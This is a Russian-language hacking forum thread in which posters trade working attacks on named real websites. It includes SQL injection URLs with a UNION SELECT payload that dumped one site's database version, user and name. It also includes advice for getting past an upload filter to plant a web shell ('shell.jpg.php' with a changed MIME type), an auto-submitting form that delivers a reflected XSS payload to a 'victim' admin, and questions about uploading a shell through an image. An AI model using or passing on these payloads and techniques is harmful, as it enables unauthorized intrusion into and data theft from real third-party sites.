Опять я, опять Парюсь)) http://ua-foto.com/fotogal/:442%27/ День бюся результата ноль) либо http://ua-foto.com/eshop/121/0:226'/ он мне более нравица)) cms webo При запросе: http://ua-foto.com/eshop/121/0:226%20and%201=1%20order%20by%201/* Уже надрываеца Unknown column '20and' in 'where clause'
_http://ua-foto.com/eshop/143' тут тоже скуля и раскрытие пути. может че-то накопаешь а вот тут уже интереснее, нашёл: _http://ua-foto.com/search/10/167/0/?&qs=&f[226]=&sf226=:3&sf447=-1)%20union%20select%201/*&f[447]=4&go=1&sort_type=1 перебрал и получил: _http://ua-foto.com/search/10/167/0/?&qs=&f[226]=&sf226=:3&sf447=-1)%20UNION%20SELECT%201,2,3,4,5,6,7,8,concat_ws(0x3a3a3a,version(),user(),database()),10,11,12,13,14,15,16,17,18,19,20,21,22/*&f[447]=4&go=1&sort_type=1 Поля вывода: 1,7,9,14. 9 самое нормально поле) получили) 5.0.27:::uaphoto@localhost:::uaphoto
Похекал я админку на одном сайте, а там что бы загрузить файл на сервер можно использовать только скрипт загрузчика картинок а в нем такой код присутствует PHP: //File Name Check if (( $file_name ==".jpg")||( $file_name ==".jpeg")||( $file_name ==".png")||( $file_name ==".gif")) { $message = "Invalid File Name Specified, be sure its a '.jpg'"; return $message; } и PHP: //File Type Check else if ( $file_type == "text/plain" ) { $message = "Sorry, You cannot upload any script file" ; return $message; } можно как то обойти эти фильтры?
.Striker, увидеть бы объявление $file_name. А вообще попробуй назвать файл shell.jpg.php и майм-тайп смени.
не могу догнать что можно сделать: нашёл xss в поиске, Code: "><script>alert(/xss/)</script> показывает мне сообщение. форма поиска методом POST работает. я так понимаю это пассивная xss и мне нужно каким-то образом заставить админа кликнуть на Поиск с моими параметрами? какие ещё могут быть варианты применения данной дыры?
посмотри , скорее всего в гете тоже есть полный вид запроса Если нет, отлови ПОСТ запросы и попробуй через гет отправить
Есть парочку показательных видео..что делать с пассивками как впаривать, и вообще как обращаться) Гляньтут
PHP: <form name='wtf' method='post' action='http://site.ru/search.php'> <input type='hidden' name='search' value='"><script>alert(/xss/)</script>'> </form> <script>wtf.submit();</script> правишь то что тебе надо, сохраняешь в .html и кидаешь ссылку на файл жертве
Вот не могу понять, есть сайт http://www.wen.ru/ на нем есть форум. Шелл просто так не залить, для картинки просит урл. Можно ли сделать так. Залить картинку в которой будет либо шелл, либо редирект на урл с шеллом. И получится ли? А может есть какой то другой способ?
Rejjin, чтобы шелл-картинка сработал надо иметь инклюд под рукой. Или он просто не выполница как пхп-код и всё.
PHP: phpBB : Critical Error Error creating new session DEBUG MODE SQL Error : 1114 The table 'phpbb_sessions' is full INSERT INTO phpbb_sessions (session_id, session_user_id, session_start, session_time, session_ip, session_page, session_logged_in, session_admin) VALUES ('d28f3eaae27fac24621bd1563ea4a3f9', 15103, 1221142494, 1221142494, '59bee7c5', 0, 1, 0) Line : 205 File : sessions.php Что я с этого могу поиметь?
